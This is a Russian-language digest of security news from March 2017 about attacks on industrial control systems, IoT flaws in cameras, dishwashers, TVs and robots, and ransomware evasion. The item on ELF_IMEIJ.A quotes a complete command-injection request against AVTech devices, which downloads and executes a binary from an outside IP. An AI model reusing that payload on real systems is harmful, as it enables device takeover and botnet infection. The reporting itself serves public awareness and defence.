31 марта 2017

Объекты критической инфраструктуры под ударом

Новое исследование «Лаборатории Касперского» обнажило растущую проблему кибератак на компьютеры, используемые в промышленной сфере. В первом регулярном отчете о состоянии кибербезопасности на промышленных объектах Центра ICS CERT при «Лаборатории Касперского» говорится о постоянном росте числа атакованных машин во второй половине 2016 года.

По данным отчета, в период с июля по декабрь с вредоносным ПО в России столкнулось 42% компьютеров, так или иначе относящихся к технологической сети предприятий. В 28% случаев вредоносное ПО попадало на компьютеры из Интернета, в 6% – при подключении переносных накопителей. В сетях промышленных предприятий обнаружено в общей сложности 20 тыс модификаций вредоносного ПО.

Тем не менее, в большинстве случаев угрозы попадали в компьютеры случайно, а не вследствие целевых атак. Это тренд характерен не только для России: недавнее исследование Dragos показало, что около 3 тыс. промышленных предприятий подвержены атакам вредоносного ПО, но большей частью эти атаки ни к чему не приводят.

Компьютеры заражаются обычными зловредами вроде Sivis, Ramnit и Virut, которые не содержат специальных компонентов для вывода из строя индустриального оборудования. Например, в результате известной «атаки» на АЭС в Германии сеть предприятия была заражена червем Conficker, неспособным причинить вред оборудованию. Тем не менее небольшая часть инцидентов, проанализированных в Dragos, является целевыми атаками, направленными на вывод из строя объектов критической инфраструктуры.

Также в отчете «Лаборатории» говорится о том, что ICS CERT обнаружил серию фишинговых атак, начавшихся не позднее июня 2016 года и продолжающихся до сих пор. Они направлены преимущественно на промышленные компании; в общей сложности атакам подверглись более 500 организаций в более чем в 50 странах мира.

В системах промышленной автоматизации, в том числе на объектах критической инфраструктуры, обнаружено 75 незакрытых уязвимостей, в том числе 58 максимально критичных для безопасности предприятий. Из 75 обнаруженных в 2016 году «Лабораторией Касперского» уязвимостей к середине марта 2017 года производителями промышленного ПО было закрыто только 30.

Практика патчинга и поиска уязвимостей систем в промышленном секторе до сих пор оставляет желать лучшего, и тренд нельзя назвать обнадеживающим. Работа с уязвимостями в цикле разработки ПО пока не систематизирована: нет налаженного процесса выявления и приоритизации уязвимостей; обновления безопасности для уже используемого ПО не выпускаются, вместо этого производитель предпочитает учитывать информацию о них в следующем релизе этого ПО.

Также исследования показывают, что процесс установки критических обновлений для владельцев АСУ ТП промышленных объектов либо слишком трудоемкий, либо не является приоритетной задачей в общем цикле жизнедеятельности системы. В результате на многих предприятиях критические обновления на различные компоненты промышленных систем не устанавливаются годами, что делает эти предприятия уязвимыми в случае кибератак злоумышленников.

Среди вредоносных программ, обнаруженных в технологических сетях, преобладают троянцы. Так как большей частью зловреды попадают на компьютеры, подключенные к критической инфраструктуре, нецеленаправленно, промышленным сетям угрожают те же самые типы вседоносных программ, что и корпоративным. Тем не менее, исследование показало, что интерес киберпреступников к промышленным объектам возрос: из всех целевых атак, обнаруженных «Лабораторией Касперского» в 2016 году, каждая четвертая была направлена в том числе и на предприятия.

В связи с этим в актуальной доктрине кибербезопасности России особое внимание уделено угрозам, направленным на объекты критической инфраструктуры. Изоляция промышленных сетей от Интернета, раньше считавшаяся панацеей, больше не может рассматриваться как мера защиты. Доля попыток заражений вредоносным ПО с участием переносных носителей, заражений резервных копий, использование в сложных атаках изощренных способов переноса данных из изолированных сетей свидетельствуют о невозможности избежать рисков путем простого отключения системы от интернета.

Также стоит отметить, что уровень осведомленности об актуальных трендах и угрозах информационной безопасности на промышленных предприятиях достаточно низок, что создает дополнительные риски.


Источник: Threatpost | Новости информационной безопасности

Siemens предлагает временную защиту для RUGGEDCOM

Используемые на хозяйственных объектах многофункциональные продукты линейки RUGGEDCOM производства Siemens содержат ряд незакрытых уязвимостей. Во вторник группа быстрого реагирования на киберинциденты в сфере управления производственными процессами (ICS-CERT) опубликовала соответствующее предупреждение, перечислив бреши, подвергающие конечные точки VPN и брандмауэры риску атаки на перехват административного управления.

Siemens опубликовала лишь рекомендации по защите от эксплойта. Будут ли выпущены патчи, неясно, так как некоторые модели сетевых устройств RUGGEDCOM, идентифицированные как уязвимые, были сняты с поддержки более года назад. Со слов разработчика, уязвимые устройства используются в так называемых «неблагоприятных условиях среды» – на электрических подстанциях, в пунктах управления дорожным движением.

«28 марта 2017 года Siemens опубликовала информационный бюллетень SSA-327980 и выпустила инструмент для устранения всех пяти уязвимостей, затрагивающих устройства на базе RUGGEDCOM ROX I, – заявил журналистам Threatpost представитель компании-разработчика. – Если появится новая информация, бюллетень будет обновлен».

Уязвимости обнаружил и сообщил о них вендору Максим Рупп (Maxim Rupp). Данных об активном эксплойте какого-либо из пяти багов у исследователя нет, однако он предупредил, что атака не потребует особых технических навыков. По свидетельству Руппа, уязвимыми являются сетевые устройства серии RX1000 с прошивкой версии ROX1.16.1 и веб-интерфейсом Webmin 1.160-2.rr880.

«Неискушенный злоумышленник сможет удаленно и без аутентификации скомпрометировать доступность, целостность и конфиденциальность промышленного устройства Siemens RX1000, – пишет исследователь в бюллетене. – В итоге маршрутизатор будет служить точкой входа в сеть, в которой он расположен. Успешный эксплойт этих уязвимостей может значительно снизить защищенность сетевой зоны, в которой размещено уязвимое устройство. Последствия для промышленных организаций зависят от многих факторов, которые для каждого предприятия индивидуальны».

Из пяти найденных им уязвимостей Рупп особо выделил две как наиболее опасные: возможность неограниченной загрузки файлов и неправильная конфигурация сервера. В серверных настройках исследователь обнаружил две ошибки. Во-первых, на сервере отсутствует защита содержимого директорий, и списки приватных данных находятся в открытом доступе. Во-вторых, все запущенные процессы исполняются из-под учетной записи root.

«Используя слабость конфигурации, злоумышленник может расширить доступ для дальнейшей компрометации инфраструктуры, – поясняет Рупп. –  Возможность отслеживания и модификации трафика позволяет проводить различные атаки: DoS, MitM, угоны сессий. Это может поставить под угрозу другие устройства, расположенные в одной сети с уязвимым RX1000».

Возможность загрузки произвольных файлов, по словам исследователя, возникла из-за отсутствия верификации загружаемого контента и ограничений на доступ к загруженным данным пользователя. «Это позволяет атакующему загружать скрипты в Webroot с целью выполнения произвольных команд на целевом хосте, – пишет Рупп. – Директория для загрузки определяется не приложением, а на стороне клиента, поэтому загрузку файлов можно осуществлять, управляя ею с клиента. Это ошибка сценария применения приложения, которым, как оказалось, можно пользоваться с ограниченными правами доступа. В результате автор атаки сможет воспользоваться этим недочетом для получения доступа к другим внутренним хостам».

Еще одна уязвимость, найденная Руппом, вызвана неадекватной нейтрализацией входных данных при создании веб-страниц. В ходе тестирования приложение обработало порядка 20 потенциально опасных спецсимволов вроде <, > и «‘». «Эти специальные символы могут быть интерпретированы как элементы сценария, обрабатываемые в браузере, что открывает возможность для межсайтового скриптинга (XSS). – предупреждает Рупп. – XSS-атака позволит злоумышленнику выполнить произвольный JavaScript-код в контексте браузера безобидного пользователя и получить доступ к конфиденциальным данным».

Остальные обнаруженные уязвимости – это обход каталога, позволяющий без аутентификации читать произвольные файлы через веб-интерфейс и получить доступ к конфиденциальным данным, и CSRF с доступом через тот же интерфейс на TCP-порту 10000.


Источник: Threatpost | Новости информационной безопасности

90% «умных» телевизоров уязвимы к удаленному взлому через DVB-T сигнал

Новая атака на «умные» телевизоры позволяет злоумышленнику взять устройство под контроль при помощи DVB-T (Digital Video Broadcasting — Terrestrial) сигналов, получить права суперпользователя и использовать устройство для различных вредоносных действий - от DDoS-атак до шпионажа за владельцем телевизора.

До настоящего времени все атаки на «умные» телевизоры предполагали физический доступ преступника к устройству, которому для его компрометации требовалось подключить USB-накопитель с вредоносным кодом, либо основывались на методах социальной инженерии. Поскольку у обоих методов есть свои ограничения, специалист компании Oneconsult Рафаэль Шиль (Rafael Scheel) решил разработать собственную атаку.

Как пояснил исследователь в интервью журналисту BleepingComputer, принцип атаки основан на стандарте HbbTV (ТВ-стандарт для передачи дополнительных предложений из интернета на телевизор), поддерживаемом большинством кабельных операторов и производителей смарт-телевизоров. По его совам, любой человек может приобрести и модифицировать DVB-T передатчик, оборудование стоимостью $50-$150 и начать транслировать DVB-T сигнал.

Как правило, телевизоры подключаются к более сильному сигналу. Поскольку сигналы кабельных операторов передаются с расстояния в десятки или сотни километров, для осуществления атаки злоумышленнику потребуется разместить свой передатчик ближе - в рядом стоящих домах, близлежащих районах, можно также использовать дрон с установленным передатчиком, говорит эксперт.

По его словам, проблема заключается в том, что стандарт HbbTV, передаваемый DVB-T сигналами, позволяет передавать на телевизор команды на загрузку web-сайтов. Шиль разработал два эксплоита и внедрил на свой сайт, который затем загрузил на «умном» телевизоре через встроенный браузер. В результате исследователь смог выполнить код на устройстве, получить права суперпользователя и получить контроль над телевизором.

Первый эксплоит, разработанный Шилем, эксплуатировал уязвимость CVE-2015-3090 (одна из уязвимостей нулевого дня, о которой стало известно в результате взлома Hacking Team в 2015 году) в Flash Player. Так как плагин поддерживают не все встроенные в телевизоры браузеры, эксперту пришлось разработать еще один эксплоит, использовавший старую уязвимость в JavaScript функции Array.prototype.sort(), поддерживаемой всеми браузерами. Данный эксплоит позволил исследователю повысить права и получить доступ к прошивке устройства.

Специалист опубликовал видео с демонстрацией атаки


Источник: Новости - SecurityLab.ru

29 марта 2017

Cerber научился избегать обнаружения алгоритмами машинного обучения

Авторы семейства вымогателей Cerber разработали новую технику, позволяющую уклоняться от обнаружения антивирусами. В составе новой версии вредоносного ПО появился загрузчик, помогающий избегать детектирования решениями, использующими технологии машинного обучения.

Как правило, вымогательское ПО распространяется посредством электронной почтовой рассылки и новые версии Cerber не стали исключением. Согласно сообщению исследователей из компании Trend Micro, электронные письма содержат ссылку на подконтрольную злоумышленникам страницу в Dropbox, откуда на систему жертвы загружается самораспаковывающийся архив. Архив включает три файла: VBS скрипт, DLL файл и конфигурационный файл. Последний содержит различные настройки конфигурации, а также загрузчик, который проверяет, находится ли он в виртуальной машине или в «песочнице», какие инструменты анализа и антивирусы запущены на компьютере жертвы.

Необходимость использования отдельного загрузчика связана с внедрением технологий машинного обучения в защитные решения, поясняют исследователи. Такие продукты активно детектируют вредоносные файлы на основании функционала, а не сигнатуры. Использование нового загрузочного механизма снижает эффективность статичного подхода, то есть методов, анализирующих файл без его исполнения или эмуляции.

По словам специалистов, все самораспаковывающиеся файлы имеют похожую структуру, вне зависимости от содержимого. Нераспакованные файлы с ограниченным функционалом также не выглядят вредоносными. Иными словами, то, как «упакован» Cerber позволяет ему избегать обнаружения алгоритмами машинного обучения. Тем не менее, отмечают исследователи, вредоносную программу могут обнаружить защитные решения, использующие разнообразные техники и не слишком полагающиеся на машинное обучение.


Источник: Новости - SecurityLab.ru

28 марта 2017

ИБ-инциденты на промышленных объектах чаще всего случайны

Большинство киберинцидентов на промышленных объектах происходят из-за случайного заражения, хотя небольшое количество заражений все же происходят в результате целевых атак. К такому выводу пришли исследователи из Dragos, проанализировав около 500 тыс известных кибератак на промышленные предприятия и более 30 тыс образцов использованного в них вредоносного ПО и зараженных файлов промышленных контроллеров – огромное количество данных, выложенных на Virus Total.

Эксперты задались целью исследовать природу атак на промышленные объекты, которые зачастую неправильно интерпретируются прессой ради создания ажиотажа. Действительно, обнаруженные в системах управления промышленными процессами (АСУТП) вредоносные программы попали в сеть предприятия случайно.

Системы АСУТП состоят из двух частей: системы SCADA отвечают за сбор данных с датчиков и управляют работой промышленных агрегатов, в то время как специализированное ПО обеспечивает взаимодействие человека с оборудованием. Так как довольно малое количество вредоносных программ способно исполняться в системах SCADA, промышленные предприятия подвергаются атакам через компьютеры, управляющие SCADA. Раньше системы промышленных объектов были изолированы от проникновения извне, но сегодня управлять АСУТП-системами через Интернет удобно, и поэтому подключенные к сети компьютеры становятся точкой входа для кибератак.

По данным отчета, около 3 тыс промышленных предприятий подвержены атакам вредоносного ПО, но большей частью эти атаки ни к чему не приводят. Компьютеры заражаются обычными зловредами вроде Sivis, Ramnit и Virut, которые не содержат специальных компонентов для вывода из строя индустриального оборудования. Например, в результате известной «атаки» на АЭС в Германии сеть предприятия была заражена червем Conficker, неспособным причинить вред оборудованию.

Тем не менее, небольшая часть инцидентов, проанализированных в Dragos, является целевыми атаками, направленными на вывод из строя объектов критической инфраструктуры. Эксперты обнаружили чуть более десятка вредоносных атак на АСУТП-системы, и только одна из них выделяется из других. За последние четыре года один и тот же самый вредоносный файл всплывал около десяти раз, последний раз – в текущем месяце. То есть, в течение четырех лет некий злоумышленник пытался совершать атаки на промышленные объекты, маскируя вредоносную программу под PLC-контроллер Siemens. Детектирование этого вредоносного файла классифицировалось как ложное срабатывание. Скорее всего, это был зловред под названием Irongate.

Хотя атаки подобного рода – редкость, истории известны примеры зловредов, направленных на SCADA-системы. Начало им положил нашумевший инцидент с червем Stuxnet, похоронившим ядерную программу Ирана. Также в разряд подобных зловредов можно отнести Havex и BlackEnergy2. Исследователи уже испытали в лабораторных условиях червь для SCADA PLC-Blaster и специализированный вымогатель для SCADA LogicLocker.

Причина участившихся атак на промышленные объекты – неизбежное проникновение Интернета в отрасль. Возможность управления SCADA-системами удаленно имеет неоспоримые экономические преимущества, но каждое подключение создает уязвимость в воображаемой стене, которая традиционно разделяла ИТ и различные технологии эксплуатации предприятия.

Раньше АСУТП-системы были абсолютно изолированы от внешнего мира, что и заложило отставание промышленных предприятий от остального мира с точки зрения информационной безопасности. Логика работающих и ныне промышленных контроллеров была разработана около полувека назад и не приспособлена к актуальным вызовам. Кроме того, также существует проблема низкой осведомленности персонала о существующих киберугрозах.

Например, легитимное ПО для АСУТП-систем (включая инсталляторы интерфейсов «человек-машина» и генераторы ключей) было обнаружено в публично доступных базах данных вроде VirusTotal. Всего, по словам исследователей, таким образом было скомпрометировано более 120 файлов проектов. Злоумышленнику, планирующему атаку, достаточно просто скачать эти файлы и изучить их устройство. Также в открытом доступе обнаружены конфиденциальные данные – отчеты о состоянии безопасности на объекте, отчеты о ремонте и эксплуатации оборудования и многое другое.

Эксперты Dragos также советуют поработать над уровнем осведомленности сотрудников об информационной безопасности – но больших надежд не питают: если бы разработчики АСУТП-систем и представители промышленных объектов волновались о проблемах кибербезопасности, 92% хостов АСУТП не были бы уязвимы.


Источник: Threatpost | Новости информационной безопасности

В «умных» моечных машинах Miele обнаружена уязвимость

Исследователи в области безопасности неоднократно предупреждали об угрозах, связанных с устройствами из сферы «Интернета вещей». Если ранее речь шла в основном о подключенных к интернету принтерах, холодильниках, кофеварках и телевизорах, то сейчас в этот список добавились посудомоечные машины.

Специалист компании Schneider & Wulf Йенс Регель (Jens Regel) обнаружил уязвимость (CVE-2017-7240) во встроенном web-сервере PST10 WebServer автоматов для мойки и дезинфекции Miele Professional PG 8528 PST10, позволяющую неавторизованному злоумышленнику провести атаку «обход каталога» (directory traversal) и получить доступ к важным данным, которые впоследствии могут использоваться для осуществления других атак.

В ноябре минувшего года исследователь проинформировал производителя об уязвимости, однако компания проигнорировала его сообщение. В настоящее время нет информации о доступности обновления, устраняющего данную проблему.

По словам эксперта компании F-Secure Микко Хиппонена (Mikko Hyppönen), в ближайшее время не стоит ожидать улучшений в сфере безопасности IoT- устройств.

«Превращение простого устройства в «умное» будет стоить всего 10 центов. Это будет настолько дешево, что производители будут оборудовать чипами любое устройство, даже если полученные преимущества будут весьма небольшими. Но эти преимущества будут не для вас, потребителей, а для производителей, которые хотят собирать аналитику. IoT-устройства будущего не будут подключаться к интернету для вашей выгоды - вы даже не будете знать, что это IoT-устройство», - отметил Хиппонен.


Источник: Новости - SecurityLab.ru

24 марта 2017

[ZLONOV.ru] Один день из жизни РусКрипто

ZLONOV.ru
Пост Один день из жизни РусКрипто опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov

Умнеющие города

Мы все наслышаны о тех социальных и экологических проблемах, которые возникают на фоне постоянной глобальной урбанизации. Однако, технологии умного города, кажется, способны дать ответы на многие из поставленных вопросов, и не только решить проблемы климатических изменений, перенаселения или чрезмерного потребления ресурсов – умные технологии способны сделать наши жизни еще удобнее и комфортнее. О каких технологиях идет речь?



Зеленые IoT инициативы


Мы уже писали о потенциале Интернета вещей в деле сохранения природы. Благодаря миллиардам встраиваемых датчиков государственные органы и компании имеют возможность более полно оценивать выброс углекислого газа и отслеживать уровень загрязнения. На Всемирном мобильном конгрессе 2017 года компании AT&T и GE объявили о начале партнерских отношений с целью разработки экологических IoT технологий для использования в городах Северной и Центральной Америки. Интеллектуальные узлы датчиков позволят реализовать новое поколение систем уличного освещения. Датчики будут полностью интегрированы в столбы освещения, что позволит муниципалитетам задействовать уже имеющиеся столбы, установив туда энергетически эффективные светодиодные лампы.

На пути к внедрению сетей 5-го поколения в умных городах


Сети 5G – это общий термин, обозначающий новое поколение телекоммуникационных стандартов. На Всемирном мобильном конгрессе мы видели много новостей об оптимизированных для IoT технологиях межмашинного взаимодействия и о планах запуска сетей LTE Cat NB-IoT, что будет способствовать развитию технологий 5G. Чтобы люди могли получить представление об открывающихся возможностях, Gemalto продемонстрировал на своем стенде в рамках MWC решение для освещения и подзарядки электромобилей в умном городе на базе eluminocity – технологии, разработанной совместно с нашими партнерами.

Это решение включает в себя интеллектуальные датчики и позволяет превратить столбы уличного освещения в умные платформы, которые подключаются к центральной системе управления и предполагают наряду со своей основной функцией самые различные варианты использования – теперь в них реализована регулировка яркости высокомощных светодиодных ламп по мере необходимости, что позволяет использовать их даже для предупреждения водителей и пешеходов. Кроме того, датчики, установленные на столбах освещения, способны определять, свободно ли расположенное под ними парковочное пространство, а владельцы электромобилей смогут выяснить расположение ближайшего доступного терминала для подзарядки и даже бронировать его с помощью своих смартфонов. Для дополнительного удобства, использование стандартных разъемов, использующихся в том или ином регионе, позволяет подзаряжать практически любые доступные сегодня на рынке модели электромобилей. Эта инновация раскрывает возможности создания еще более умных и экологичных городских систем.

Беспилотные автомобили


Одна из наших самых любимых инноваций этого года – беспилотный суперкар от компании Roborace, первый в мире беспилотный гоночный болид. Он способен развивать невероятную скорость – до 320 км/ч, и перемещается, используя на данные, собираемые с датчиков и шести камер. Для управления автомобилем используются алгоритмы, разработанные инженерами Roborace. Возможно, в будущем звездами автоспорта станут не гонщики, а компьютерные инженеры, которые работают над стратегией победы.

Создание Интернета доверенных вещей


Чтобы умный город мог надежно функционировать, лежащая в его основе инфраструктура должна быть умной и защищенной. К примеру, для создания функциональной системы уличного освещения необходимо наличие защищенного соединения между лампами и централизованной системой управления. Это сложный процесс, в котором необнаруженная уязвимость в одной части системы способна привести к компрометации безопасности всей системы. Поэтому тем, кто занимается созданием критически важной инфраструктуры и решений для умных городов, следует очень внимательно и со всех сторон продумывать архитектуру своих сетей и тех систем, которые они соединяют, будь то автопарковка, система управления трафиком или система утилизации отходов.

Чтобы добиться нужного результата, государственным органам и другим заинтересованным сторонам необходимо научиться подключать, защищать и монетизировать свою IoT стратегию, подбирая сочетание безопасных сетевых решений, гибких платформ монетизации и эффективных систем управления жизненным циклом.

Источник: Хабрахабр / Информационная безопасность / Интересные публикации

Злоумышленники могут отключить камеры наблюдения Nest Dropcam посредством Bluetooth-атаки

Независимый исследователь Джейсон Дойл (Jason Doyle) предупреждает об уязвимостях в камерах наблюдения Nest Dropcam и Dropcam Pro. Устройства, которые должны защищать владельцев от грабителей, можно легко обезвредить с безопасного расстояния.

Дойл сообщает, что в прошивке версии 5.2.1 содержатся три уязвимости, при помощи которых можно спровоцировать отказ работы камеры через обычный Bluetooth. Еще в октябре 2016 года исследователь уведомил о проблемах разработчиков Nest и холдинга Alphabet Inc (Google), которому с 2014 года принадлежит компания. Однако патчей по-прежнему нет, и Дойл решил рассказать об уязвимостях публично.

Два бага позволяют спровоцировать переполнение буфера устройства, просто пингуя камеру посредством Bluetooth Low Energy (BLE). Дело в том, что Bluetooth в камерах Nest активен всегда и включен по умолчанию. В результате можно добиться аварийной перезагрузки девайса, к примеру, посылая ему длинные пароли для Wi-Fi. Еще одна проблема вынуждает устройство разорвать текущее соединение с сетью. Для этого достаточно передать камере новый Wi-Fi SSID, заставив ее попытаться соединиться с несуществующей сетью. На разрыв соединения и переподключение уйдет от 60 до 90 секунд.

Дойл пишет, что если эксплуатировать эти уязвимости непрерывно, камера фактически перестанет работать и не будет записывать видео во время многочисленных перезагрузок и отключений от сети. Это может стать для злоумышленников настоящим подарком. Хотя для осуществления атак нужно находиться в зоне действия BLE, это вряд ли будет проблемой для тех, кто и так собирается проникнуть в дом.

Дойл предупреждает, что он не нашел способа обезопасить устройства Nest до выхода патча, так как отключить Bluetooth в камерах невозможно.

Издание The Register сообщает, что разработчики Nest знают о проблеме и уже работают над исправлением, однако точные сроки выхода патча пока названы не были.


Источник: «Хакер»

Хакеры атакуют АСУ ТП, однако опасаться «кибер Перл-Харбора» не стоит

За последние несколько лет американские политики неоднократно высказывали мнение, что США грозит «кибер Перл-Харбор». Под данной аналогией подразумеваются возможные кибератаки на объекты критической инфраструктуры (к примеру, на атомные электростанции), способные вызвать катастрофические последствия. Подобные сюжеты встречаются в ряде голливудских фильмов, однако специалисты, отвечающие за безопасность АСУ ТП, на самом деле не очень беспокоятся о «кибер Перл-Харборе». Как бы то ни было, недооценивать угрозу нельзя.

По словам основателя ИБ-компании Dragos, бывшего служащего ВВС США Роберта Ли (Robert Lee), эксперты в области защиты АСУ ТП не принимают всерьез угрозу целевых атак с использованием вредоносного ПО. «Пока что угрозы уничтожения электростанций нет. Не похоже, чтобы объекты перестали работать, и какой-то случайный вредоносный код в сетях электростанций, водоочистных сооружений или даже атомных электростанций мог привести к печальным последствиям. Он может затронуть операции, и это нехорошо. Однако это еще не конец света и вовсе не является проблемой безопасности», - сообщил Ли в интервью журналистам Motherboard.

Тем не менее, не стоит недооценивать противников, уже сейчас пытающихся совершать целевые атаки и из года в год совершенствующих свои навыки, отметил Ли. Эксперт и его команда изучили образцы вредоносов, обнаруженные в сетях АСУ ТП. Помимо случайно попавшего в сети устаревшего вредоносного ПО, исследователи также обнаружили десятки образцов кода, специально разработанных для атак на АСУ ТП.

В ближайшее время Ли опубликует доклад об обнаруженных двух новых образцах вредоносного ПО, использовавшихся в ходе атак на промышленные предприятия. В ходе одной из кампаний злоумышленники использовали вредоносный PDF-документ об управлении ядерными материалами. В ходе второй кампании киберпреступники маскировали вредоносное ПО под легитимное, предназначенное для ПЛК производства Siemens. Данный вредонос инфицировал порядка десяти промышленных объектов, в основном расположенных в США. Стоит отметить, в обоих случаях ПО предназначалось не для вмешательства в промышленные процессы, а для шпионажа.


Источник: Новости - SecurityLab.ru

21 марта 2017

Грабители могут отключить камеры видеонаблюдения Nest по Bluetooth

Камеры видеонаблюдения Dropcam и Dropcam Pro от компании Nest (принадлежит Google) содержат уязвимости, позволяющие атаковать их по Bluetooth. Исследователь безопасности Джейсон Дойл (Jason Doyle) обнаружил в версии прошивки 5.2.1 три проблемы, с помощью которых злоумышленники могут отключить запись – очень удобно, если кто-то решит ограбить «защищенный» дом Nest.

Дойл уведомил Google о наличии уязвимостей еще в октябре прошлого года, однако обновление до сих пор не выпущено, поэтому исследователь решил сообщить общественности о своих находках.

Две уязвимости позволяют вызвать переполнение буфера путем продолжительного пинга устройства через Bluetooth LE. В итоге работа камеры аварийно завершается, и устройство перезагружается.

С помощью третьей уязвимости злоумышленник может отправить камере идентификатор несуществующей сети. Устройство отключится от своей сети и попытается подключиться к несуществующей. Через полторы минуты возобновится подключение к предыдущей сети, однако в течение этого времени запись камеры будет отключена. Если повторять данный трюк, можно отключить запись на длительный отрезок времени.

Для эксплуатации уязвимостей достаточно лишь находиться в радиусе действия Bluetooth LE. По данным издания The Register, Google уже подготовила патч и в скором времени выпустит его.


Источник: Новости - SecurityLab.ru

[ZLONOV.ru] Код ИБ Уфа. Презентации не будет

ZLONOV.ru
Пост Код ИБ Уфа. Презентации не будет опубликован на сайте ZLONOV.ru


Вы можете подписаться на обновления напрямую: RSS-лента
Презентации и документы: SlideShare
Ссылка на Twitter: @zlonov

17 марта 2017

В Росгвардии опровергли информацию о создании киберразведки

Информация о создании в структуре Росгвардии подразделения, которое будет заниматься киберразведкой, не соответствует действительности. Об этом сообщила пресс-служба ведомства.

Ранее информагентство «Росбалт» опубликовало информацию о якобы создании в структуре Росгвардии подразделения, которое будет заниматься киберразведкой с целью выявления экстремистских угроз.

Как указывается в пресс-релизе, в Росгвардии принимаются необходимые меры по противодействию DDoS-атакам на ее информационные ресурсы, однако киберразведка не входит в задачи ведомства.

«Деятельность Росгвардии определена Указом Президента РФ от 5.04.2016 года № 157 и Федеральным законом от 3 июля 2016 г. N 226-ФЗ. Каких-либо иных полномочий, не наделенных данными нормативными правовыми документами, войска национальной гвардии не имеют», - прокомментировал первый заместитель директора Федеральной службы войск национальной гвардии генерал-полковник Сергей Меликов.


Источник: Новости - SecurityLab.ru

В роботах дистанционного присутствия Double Robotics обнаружили несколько уязвимостей

Роботы дистанционного присутствия, они же роботы с эффектом присутствия (Telepresence Robot) – это мобильные устройства для конференций, которые позволяют удаленному пользователю присутствовать в офисе, учебном заведении или другом месте, имея возможность поддерживать диалог «лицом к лицу». Такие устройства часто описают как «планшет на палке», и такие роботы действительно популярны и востребованы во многих компаниях и организациях.

Исследователи Rapid7 сообщили, что устройства Double Robotics, как и многие другие IoT-гаджеты, подвержены сразу нескольким серьезным уязвимостям, в том числе проблеме, которая в теории позволяет атакующему полностью перехватить управление роботом.

Так, одна из найденных специалистами уязвимостей, позволяет неавторизованному атакующему получить доступ к информации об устройстве, включая координаты GPS, серийный номер, информацию о текущем и предыдущих «водителях» робота, данных сессий и так далее. Причем добиться всего этого можно, просто изменив один из параметров в адресе URL.

Вторая проблема связана со специальными токенами driver_token, которые создаются во время привязки робота к определенному аккаунту. Дело в том, что эти токены не имеют срока действия, никогда не меняются и не утрачивают силу. В итоге, если токен попадет в руки злоумышленника, тот сможет делать с устройством все, что пожелает.

Третья уязвимость заключается в том, что во время спаривания робота с мобильным приложением через Bluetooth пользователю не нужно знать PIN-код. То есть атакующий, вооружившийся мощной антенной, сможет без труда контролировать устройство с расстояния около километра.

Обо всех проблемах исследователи сообщили разработчикам Double Robotics еще в декабре 2016 года. В январе компания устранила первые две из вышеперечисленных уязвимостей, а вот спаривание через Bluetooth, по мнению разработчиков, не является проблемой. В компании считают, для осуществления атаки злоумышленник должен находиться достаточно близко, а также с роботом можно связать только одно устройство за раз, но не два одновременно.


Источник: «Хакер»

10 марта 2017

Обнаружено новое вредоносное ПО для IoT-устройств

Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет.

Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно.

Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО.

Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.


Источник: Новости - SecurityLab.ru

09 марта 2017

Обнаружены 185 тыс. доступных через интернет уязвимых IP-камер

ИБ-эксперты ожидают появления нового ботнета – свыше 185 тыс. IP-камер, поставляемых 354 компаниями под 1200 торговыми марками, содержат уязвимый встроенный сервер. Как сообщает Пьер Ким (Pierre Kim) из Full Disclosure, проблемными являются панель администрирования GoAhead и незащищенный протокол, по которому осуществляется подключение к облачным серверам.

По данным Кима, поисковая система Shodan находит порядка 185 тыс. подключенных к интернету уязвимых IP-камер, открытых для кибератак. В использующемся в устройствах CGI-скрипте для конфигурации FTP содержится известная с 2015 года уязвимость, позволяющая удаленно выполнить код. С ее помощью атакующий может запускать команды с правами суперпользователя или настроить не требующий пароль Telnet-сервер.

В файловой системе есть папка /system/www/pem/ck.pem, содержащая сертификат разработчика Apple с закрытым ключом RSA и учетные данные для авторизации на web-сервере, доступные через символьные ссылки system.ini и system-b.ini. Также присутствует неавторизованный RTSP-сервер, и любой, у кого есть доступ к TCP-порту 10554, может видеть передающиеся данные. Подключение камер к облачным сервисам AWS, Alibaba и Baidu активировано по умолчанию, и все, что нужно для атаки – соответствующее мобильное приложение и серийный номер атакуемого устройства.

Как пояснил Ким, если камера подключена к интернету, между нею и приложением создается UDP-туннель, где в качестве реле используется облачный сервер. Данный туннель также может служить в качестве вектора для атаки. «Туннель обходит NAT и межсетевой экран, позволяя атакующему получить доступ к внутренним камерам (если они подключены к интернету) и с помощью брутфорс-атаки определить учетные данные», - сообщил исследователь.

В списке уязвимых устройств числятся IP-камеры 3Com, D-Link, Akai, Axis, Kogan, Logitech, Mediatech, Panasonic, Polaroid и Secam.


Источник: Новости - SecurityLab.ru

07 марта 2017

Пользователи не доверяют слишком «умным» IoT-устройствам

Большинство пользователей с опаской относятся к устройствам «Интернета вещей» (IoT) и автоматизации предпочитают конфиденциальность своей частной жизни. Согласно исследованию компании Gartner, порядка двух третей пользователей беспокоятся о том, что IoT-устройства подслушивают их разговоры. Подобные опасения не беспочвенны, учитывая то и дело появляющиеся в СМИ новости о шпионящих за детьми игрушках или полицейских допросах Amazon Echo.

